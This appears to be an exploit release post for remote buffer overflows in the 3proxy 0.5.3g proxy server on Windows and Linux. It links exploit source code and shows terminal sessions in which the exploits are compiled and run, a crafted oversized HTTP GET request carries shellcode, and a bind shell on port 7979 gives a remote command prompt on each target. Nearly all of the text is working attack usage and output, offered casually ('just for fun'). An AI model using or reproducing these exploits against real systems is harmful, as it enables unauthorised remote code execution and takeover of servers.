just for fun... original exploit references: http://fakehalo.us/x3proxy-win32.c http://fakehalo.us/x3proxy.c example(win32 service): ------------------------------------------------------------------------- [v9@fhalo v9]$ gcc x3proxy-win32.c -o x3proxy-win32 [v9@fhalo v9]$ ./x3proxy-win32 -h desktop.fakehalo.lan [*] 3proxy[v0.5.3g]: (win32 service) remote buffer overflow exploit. [*] by: vade79/v9 v9@xxxxxxxxxxx (fakehalo/realhalo) [*] target: desktop.fakehalo.lan:3128 [*] return address($eip/"CALL ESP"): 0x7c81518b [*] attempting to connect: desktop.fakehalo.lan:3128. [*] successfully connected: desktop.fakehalo.lan:3128. [*] sending string: [+] GET /[FILLERx1064][EIP/"CALL ESP"][NOPSx32][SHELLCODE]\n [+] Host: [FILLERx999]\n\n [*] closing connection. [*] attempting to connect: desktop.fakehalo.lan:7979. [*] successfully connected: desktop.fakehalo.lan:7979. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> example(linux): ------------------------------------------------------------------------- [v9@fhalo v9]$ gcc x3proxy.c -o x3proxy [v9@fhalo v9]$ ./x3proxy -h XXXXXXX.net -r 0x0805333c [*] 3proxy[v0.5.3g]: (linux) remote buffer overflow exploit. [*] by: vade79/v9 v9@xxxxxxxxxxx (fakehalo/realhalo) [*] target : XXXXXXX.net:3128 [*] shellcode type : bindshell(port=7979) [*] return address($eip) : 0x0805333c(+0=0x0805333c) [*] attempting to connect: XXXXXXX.net:3128. [*] successfully connected: XXXXXXX.net:3128. [*] sending string: "GET /[NOPS][SHELLCODE][RETADDR]\nHost: [FILLER]\n\n" [*] closing connection. [*] attempting to connect: XXXXXXX.net:7979. [*] successfully connected: XXXXXXX.net:7979. Linux XXXXXXX.net 2.6.18-gentoo-r2 #1 Sun Nov 12 11:31:19 PST 2006 i686 Intel(R) Pentium(R) 4 CPU 1300MHz GenuineIntel GNU/Linux uid=515(v9) gid=572(v9) groups=572(v9)
